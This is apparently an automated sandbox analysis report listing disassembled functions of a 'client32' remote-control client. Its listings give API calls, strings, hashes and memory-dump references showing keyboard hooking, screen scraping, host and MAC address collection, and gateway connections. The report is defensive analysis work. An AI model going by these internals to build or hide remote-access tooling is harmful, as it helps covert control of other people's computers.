Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateEventMetricsSystem
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$609290$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
API String ID: 1866202007-3051280899
Opcode ID: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
Opcode Fuzzy Hash: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52

Function 1102D5B0 Relevance: 81.1, APIs: 15, Strings: 31, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102DEC0
609290, xrefs: 1102DBF5, 1102DDBB, 1102DDDF, 1102DDEC, 1102DE1C, 1102DE91
screenscrape, xrefs: 1102D9C8
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102DD24, 1102DDA3
client32 dbi %hs, xrefs: 1102DE73
Client, xrefs: 1102D995, 1102D9CD, 1102DAE4
IsA(), xrefs: 1102DD29, 1102DDA8
WTSFreeMemory, xrefs: 1102DB11
NSMWClass, xrefs: 1102D794
30/10/15 13:45:13 V12.10F4, xrefs: 1102DE6E
$session$, xrefs: 1102DD66
Warning: Unexpanded clientname=<%s>, xrefs: 1102DCA3
%sessionname%, xrefs: 1102DD39, 1102DD52
%02d, xrefs: 1102DCE8
MacAddress, xrefs: 1102DADF
ClientName, xrefs: 1102DB95
, xrefs: 1102DB65
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102DE9A
Error x%x reading %s, sesh=%d, xrefs: 1102D861
client32, xrefs: 1102D8D5
ts macaddr=%s, xrefs: 1102DACC
TSMode, xrefs: 1102D990
%session%, xrefs: 1102DD7A
ListenPort, xrefs: 1102D9B0
DisableConsoleClient, xrefs: 1102D917
TCPIP, xrefs: 1102D9B5
%s.%02d, xrefs: 1102DD00
Wtsapi32.dll, xrefs: 1102D9DC
WTSQuerySessionInformationA, xrefs: 1102DA4E
client32.ini, xrefs: 1102D805
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DAA4

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$30/10/15 13:45:13 V12.10F4$609290$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1984265443-941615914
Opcode ID: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
Opcode Fuzzy Hash: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61

Function 685A3D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 685A3D27

Strings

*Gsk, xrefs: 685A3E24
CLIENT_VERSION=1.0, xrefs: 685A3ED0
TCPIP, xrefs: 685A3DCF, 685A3DDF
CLIENT_ADDR=%s, xrefs: 685A3F4A
GSK=%s, xrefs: 685A3FCC
A3=%s, xrefs: 685A4163
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A3D75
connection_index == 0, xrefs: 685A3D7A
client247, xrefs: 685A400F, 685A406B, 685A40D1, 685A412B, 685A4185
A2=%s, xrefs: 685A4109
*Dept, xrefs: 685A41F4
APPTYPE=%d, xrefs: 685A41DD
MAXPACKET=%d, xrefs: 685A3F01
PORT=%d, xrefs: 685A3F68
A1=%s, xrefs: 685A40AF
HOSTNAME=%s, xrefs: 685A3F9A
CLIENT_NAME=%s, xrefs: 685A3F17
DEPT=%s, xrefs: 685A420C
CHATID, xrefs: 685A400A
1.1, xrefs: 685A3E02
CHATID=%s, xrefs: 685A4046
609290, xrefs: 685A3F0C
CMPI=%u, xrefs: 685A3FEA
A4=%s, xrefs: 685A41BD
Port, xrefs: 685A3DCA
CMD=OPEN, xrefs: 685A3EB9
ListenPort, xrefs: 685A3DDA
PROTOCOL_VER=%u.%u, xrefs: 685A3EEB

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: *Dept$*Gsk$1.1$609290$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
API String ID: 2102423945-26288770
Opcode ID: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
Instruction ID: 44891fd80584a1afe0cb340a92391f0779c0d43f19a44a21a32dfc9e2d24338d
Opcode Fuzzy Hash: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
Instruction Fuzzy Hash: 91E182B6C4061CAACB21DB648C90FFFB778AF99205FC045D9E90963141EB356F848FA5

Function 1113FBE0 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,74DF23A0), ref: 1113FC13
LoadLibraryA.KERNEL32(?), ref: 1113FC5C
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

Strings

SymLoadModule, xrefs: 1113FCF6
StackWalk, xrefs: 1113FCE3
SymGetLineFromAddr, xrefs: 1113FC98
SymGetLineFromName, xrefs: 1113FCB7
DBGHELP.DLL, xrefs: 1113FC6F, 1113FC74
IMAGEHLP.DLL, xrefs: 1113FC7E, 1113FC83, 1113FC89
MiniDumpWriteDump, xrefs: 1113FD43
SymGetModuleInfo, xrefs: 1113FD22
SymInitialize, xrefs: 1113FD01
SymSetOptions, xrefs: 1113FD17
SymGetLinePrev, xrefs: 1113FCCA
SymGetOptions, xrefs: 1113FD0C
SymFunctionTableAccess, xrefs: 1113FD38
SymGetLineNext, xrefs: 1113FCBF
SymGetSymFromAddr, xrefs: 1113FD2D
SymCleanup, xrefs: 1113FCEB
SymMatchFileName, xrefs: 1113FCD5
dbghelp.dll, xrefs: 1113FC38

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59

Function 1113DAD0 Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 266
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
SetLastError.KERNEL32(00000078), ref: 1113DB73
FreeLibrary.KERNEL32(00000000), ref: 1113DB85
LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
_memset.LIBCMT ref: 1113DC3D
LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
GetStockObject.GDI32(00000000), ref: 1113DC9A
LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
RegisterClassExA.USER32(?), ref: 1113DCB5

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
#17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4

Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18

Strings

HookKeyboard, xrefs: 1113DD61
riched32.dll, xrefs: 1113DECF
_License, xrefs: 1113DBF6
pcihooks, xrefs: 1113DD4D
InitUI (%d), xrefs: 1113DAFB
_debug, xrefs: 1113DDC0
*DisableDPIAware, xrefs: 1113DB25
UI.CPP, xrefs: 1113DC66, 1113DCC7
Client, xrefs: 1113DB2A
View, xrefs: 1113DD9E
TraceCopyData, xrefs: 1113DDBB
NSMGetAppIcon(), xrefs: 1113DC6B
imm32, xrefs: 1113DBBA
*quiet, xrefs: 1113DBF1
NSMWClass, xrefs: 1113DC1B, 1113DCAE
SetProcessDPIAware, xrefs: 1113DB5E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 2794364348-3534351892
Opcode ID: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
Opcode Fuzzy Hash: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56

Function 1102D679 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1

Strings

multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102DEC0
609290, xrefs: 1102DBF5, 1102DE1C, 1102DE91
screenscrape, xrefs: 1102D9C8
MacAddress, xrefs: 1102DADF
ClientName, xrefs: 1102DB95
, xrefs: 1102DB65
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102DE9A
Error x%x reading %s, sesh=%d, xrefs: 1102D861
client32 dbi %hs, xrefs: 1102DE73
Client, xrefs: 1102D995, 1102D9CD, 1102DAE4
ts macaddr=%s, xrefs: 1102DACC
TSMode, xrefs: 1102D990
WTSFreeMemory, xrefs: 1102DB11
ListenPort, xrefs: 1102D9B0
DisableConsoleClient, xrefs: 1102D917
TCPIP, xrefs: 1102D9B5
Wtsapi32.dll, xrefs: 1102D9DC
WTSQuerySessionInformationA, xrefs: 1102DA4E
client32.ini, xrefs: 1102D805
30/10/15 13:45:13 V12.10F4, xrefs: 1102DE6E
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102DAA4

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $30/10/15 13:45:13 V12.10F4$609290$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 1029625771-3753872318
Opcode ID: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
Opcode Fuzzy Hash: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61

Function 685963C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(685DB898,00000000,?,00000000,?,6859D77B,00000000), ref: 685963E8
InterlockedDecrement.KERNEL32(-0003F3B7), ref: 685963FA
EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6859D77B,00000000), ref: 68596412
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859643B
SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596450
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859646F
SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596484
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 685964A3
SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 685964C5
shutdown.WSOCK32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964E9
GetLastError.KERNEL32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964F2
timeGetTime.WINMM(?,00000001,?,00000000,?,6859D77B,00000000), ref: 68596510
#16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596526
GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596533
timeGetTime.WINMM(?,00000000,?,6859D77B,00000000), ref: 68596540
Sleep.KERNEL32(00000001,?,00000000,?,6859D77B,00000000), ref: 6859654B
#16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596563
closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596574
WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859657D
Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859658E
GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859659E
_memset.LIBCMT ref: 685965C8
LeaveCriticalSection.KERNEL32(?,?,6859D77B,00000000), ref: 685965D7
LeaveCriticalSection.KERNEL32(685DB898,?,00000000,?,6859D77B,00000000), ref: 685965F2

Strings

CloseGatewayConnection - closesocket(%u) FAILED (%d), xrefs: 685965A9
InternetCloseHandle, xrefs: 68596435, 68596469, 6859649D
CloseGatewayConnection - shutdown(%u) FAILED (%d), xrefs: 685964FD

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
API String ID: 3764039262-2631155478
Opcode ID: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
Instruction ID: 369a002f3b48f126020b325555e63da1069fb9b65c6b3de85ce35cf1eb95a096
Opcode Fuzzy Hash: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
Instruction Fuzzy Hash: 46518275640340AFDB10EFA8C888B9A77F9EF89315FD14515EE1AD7280DB70E888CB95

Function 685998D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strncmp.LIBCMT ref: 6859996F
_strncmp.LIBCMT ref: 685999A5

Strings

CMD=NC_DATA, xrefs: 6859999F
%02x %02x, xrefs: 68599AE7
%s, xrefs: 68599AAA
Error send returned 0 on connection %d, xrefs: 68599CF8
Error %d sending HTTP request on connection %d, xrefs: 68599D1F
abort send, gateway hungup, xrefs: 68599D2E
NC_DATA, xrefs: 68599969
3', xrefs: 68599CB2
xx %02x, xrefs: 68599AFB
Error %d writing inet request on connection %d, xrefs: 68599BE3
SendHttpReq failed, not connected to gateway!, xrefs: 68599934, 68599B79

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
